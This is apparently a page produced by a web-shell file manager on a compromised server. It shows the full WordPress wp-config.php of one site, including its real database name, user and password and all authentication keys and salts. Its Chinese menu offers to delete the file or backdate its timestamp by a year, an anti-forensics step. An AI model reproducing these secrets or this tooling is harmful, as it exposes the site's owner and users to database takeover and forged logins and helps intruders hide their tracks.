文件操作 - wp-config.php
返回文件管理
返回主菜单
删除本文件
文件: /home/moin/htdocs/www.moin.show/wp-config.php
编辑文件内容
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'moin' ); /** Database username */ define( 'DB_USER', 'moin' ); /** Database password */ define( 'DB_PASSWORD', 'fUQ1tWi3s9OXuCVzCFhO' ); /** Database hostname */ define( 'DB_HOST', '127.0.0.1:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'Gf<:PF;<u~s)d>D,m$$GH}+HY7No^ri*a>Ht>QLc - f@jQ^E<&CS_)J(1$RT(t1' ); define( 'SECURE_AUTH_KEY', 'RBMD_QqCU38G%XUW9&/n5W]=8R=7n-Dp]88n60p>?GucL-j.3d1y=|F=SG^~LVhB' ); define( 'LOGGED_IN_KEY', ')dt{jRn[@/ocl9O+3/qby!tKCy#Y}b<(<LI7NaE<:Q{lCp2GeK8fM&A>{a(QRsxV' ); define( 'NONCE_KEY', 'sAs,!#6p)Da(sM<-4h@xp%iKQEFnt=4wUmOn]@vLOgYd})wDY[R82}xf4A^0kD^[' ); define( 'AUTH_SALT', 'f]01)KcUPsT~$42+ASR^Ka/`ihN{aM!HQpwJw|dkD6e>_&m<!0W(dQ!6t2Z+F?pP' ); define( 'SECURE_AUTH_SALT', '{#J(}64`[pp/aGIR%q.e&Vw<+M`b1`puB_I~#Md`Rbe1m]!?r``4lM1yP`k+:@6T' ); define( 'LOGGED_IN_SALT', '/q`wiC:a~bZoE5Mi/8i+:pa.+i!I_Q-6tJSN=a,75e+pp.bXH*:2`4@vrU-5~WIA' ); define( 'NONCE_SALT', 'sfTNJ~;sRJZonYBlU{U zQ@M(SlNkRi^M*;RhjKfku|J2j:8fr~RzPQK~i#UaW^F' ); define( 'WP_CACHE_KEY_SALT', 'JloG$9!0d8kS%<UmGvQ%OY:8!Y9dpgWOceSTHD;8x!*8dN(z=Rs>61Nyp>%q^5CU' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ define( 'FS_METHOD', 'direct' ); define( 'WP_DEBUG_DISPLAY', false ); define( 'WP_DEBUG_LOG', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'AUTOSAVE_INTERVAL', 600 ); define( 'WP_POST_REVISIONS', 5 ); define( 'EMPTY_TRASH_DAYS', 21 ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
修改文件时间
将文件时间修改为当前时间的前一年
删除文件